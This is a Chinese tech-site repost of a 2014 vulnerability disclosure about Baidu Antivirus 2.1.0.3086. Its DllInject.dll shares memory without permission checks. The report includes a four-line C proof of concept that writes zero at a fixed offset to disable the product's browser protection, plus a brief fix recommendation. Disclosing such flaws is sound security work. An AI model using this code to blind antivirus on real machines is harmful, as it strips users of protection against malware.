2345技术员联盟
大家都在搜: 显卡天梯图 10m宽带下载速度 cos操作系统
  • 入门知识 | 电脑基础 | 电脑常识
    系统常识 | 电脑百科 | 经验技巧
    电脑优化 | 软件技巧 | 技术教程
  • CPU故障 | 主板故障 | 内存故障 | 硬盘故障
    显卡故障 | 显示器故障 | 系统故障 | BIOS故障
    CPU知识 | 硬盘知识 | 内存知识 | 主板知识
  • Win7 | Win8 | WinXP
    Win Server | Mac OS | Linux
    Win10 | Ubuntu | Centos
  • DIY配置 | 网络故障 | 网络技术
    网吧维修 | 路由器 | 无线网络
    病毒安全 | IT业界资讯 | 代理IP
  • 系统工具 | 检测工具
    补丁插件 | 驱动软件
    系统优化 | 网络工具

    • 百度杀毒曝共享内存漏洞

    • 来源:红黑联盟 转载
    • 时间:2014-12-09
    • 阅读:
    • 本文标签:百度杀毒

    DllInject.dll使用共享内存数据,且无权限检查,任意进程均可对其进行修改,造成百度杀毒对浏览器的防御失效。

    chrome浏览器为例:

    攻击前:

    破坏前.png

    攻击后:

    破坏后.png

    可以看到,攻击后,chrome不再加载百度杀毒WebSafe、WebMonHook等几个功能DLL

    1. LPCTSTR lpszDll = _T("C:\\Program Files\\Baidu\\BaiduSd\\2.1.0.3086\\websafe\\DllInject.dll"); 
    2. HMODULE hMod = LoadLibrary(lpszDll); 
    3. DWORD* shareAddr = (DWORD*)((DWORD)hMod + 0x6000); // 针对2.1.0.3086的DllInject.dll 
    4. *shareAddr = 0

    修复方案:

    使用更为安全的内存共享手段,增加权限控制。

    相关文章

  • 简单批处理轻松干掉百度杀毒 524
    • 本文来自电脑技术网www.it892.com),转载本文请注明来源.
    本文链接:http://www.it892.com/content/security/virus/20141209/5708.html
    打印全文
    推荐阅读
    1. 如何追踪查杀局域网ARP断网攻击病毒
    2. 非法破解密码的几种常用方法
    3. 简单应对U盘病毒的小技巧
    4. 蠕虫病毒乔装潜伏远程控制用户
    5. 电脑中了ARP病毒怎么办
    6. 盘点那些最容易被攻击的端口
    7. 文件夹变exe恶意病毒解决
    8. 电脑中毒了怎么才能还原
    9. 云安全和主动防御两项功能的评析
    热点排行
    精彩专题
    计算机发展史 AMD CPU Intel CPU 电脑百科 无线网络速度 桌面显卡天梯图 笔记本显卡天梯图
    推荐栏目
    电脑经验 故障解决 硬件知识 无线网络 Windows 7 Windows 8 Windows 10
    实用工具
    IP地址查询 域名Whois查询 网页权重查询 北京标准时间 二维码生成工具 电脑进程查询
    下载导航
    系统下载 HDTune Win7 4GB补丁 P2P终结者 二维码生成工具 WinRAR免费版
    无觅相关文章插件,快速提升流量